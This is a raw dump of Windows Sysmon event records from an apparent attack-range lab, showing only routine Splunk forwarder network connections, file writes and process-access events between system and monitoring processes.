354300x8000000000000000216593Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:39.524{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51339-false10.0.1.12-8000- 23542300x8000000000000000216592Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:41.504{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0AE2FC084CD40368A6C7D88EEA171345,SHA256=3F0DE6994BB55CF1CF028E0DF3FA40D48D8E24ED5EFAEDB9FC07D87141B16787,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287727Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:41.277{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=33DA56CA74F13C0FAC7630257D823D4E,SHA256=7E063427829A010BA469B521DBD1AB779209168295BEA0ECFF6BE62BCF5F2D01,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000287729Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:39.235{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53439-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 23542300x8000000000000000287728Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:42.340{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A33B13FE9FEC42D961208A52712A036C,SHA256=5AEC72E37BA65CEBC7A9F130F12514AD2246F7E3182143596EA3BF68F76E146A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216594Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:42.504{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=608D2CE837FE43A8D616DCB3A93ED9FD,SHA256=234D263539CDD6BB053D1786F7D6EA877454ABCDB953D5148311B6DED1C96CF3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287730Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:43.402{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=904079430B64A425EA15625CB406DD93,SHA256=5B1EB9AFC7ACD0923556A2217C06C9A2577D487E9710EFEB26EDABEAB83F4E10,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216595Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:43.520{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=467F1ECC0268547084F0BD5A218AB9EB,SHA256=8C2EF54FD58EB58BF848C925EADD8A9E35C009F03FB5620C70B8827AA11AABF2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216596Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:44.536{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B4753C318FEB620AF3D41188EC22D93E,SHA256=BB30FF7D60AE4AD6739F3604D4372B6FFA55264EC527C4F0E847E79637F47A9F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000287732Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:42.625{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53440-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000287731Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:44.418{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FA63935701651694344CDBA962CCD7F4,SHA256=156BBB6726C338F7ABE0A5B02471D8609D43B2B9E2F3C761D126133599BF9C03,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216625Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:45.990{4F8D34B0-F11D-6215-2300-000000003902}2036NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=C796F5788518CF0F57AB5C87207C5D14,SHA256=0CE7095FECB35749AB15D15586D728EDDAEC94009FC3FB4FCEDC790B064FF951,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000216624Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:45.849{4F8D34B0-1185-6216-5804-000000003902}36281016C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216623Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:45.614{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1185-6216-5804-000000003902}3628C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216622Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:45.614{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216621Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:45.614{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216620Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:45.614{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216619Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:45.614{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216618Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:45.614{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216617Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:45.614{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216616Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:45.614{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216615Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:45.614{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216614Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:45.614{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216613Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:45.614{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-1185-6216-5804-000000003902}3628C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216612Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:45.614{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1185-6216-5804-000000003902}3628C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000216611Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:45.615{4F8D34B0-1185-6216-5804-000000003902}3628C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000216610Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:45.536{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=328C753E59B225BCBFC9295FFDE54D84,SHA256=FD4D52820A1BC202CEF111231B432CB13187778E4C8DDA819FB3981083400AF8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287733Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:45.433{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F6EDF79C73A6A28181359697CE58C039,SHA256=ECC0963940811796A12F1C8BBC087D69CF8FEBBF8A9C4534CF2F3A8A54EE03A1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000216609Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:45.114{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1185-6216-5704-000000003902}2996C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216608Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:45.114{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216607Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:45.114{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216606Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:45.114{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216605Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:45.114{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216604Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 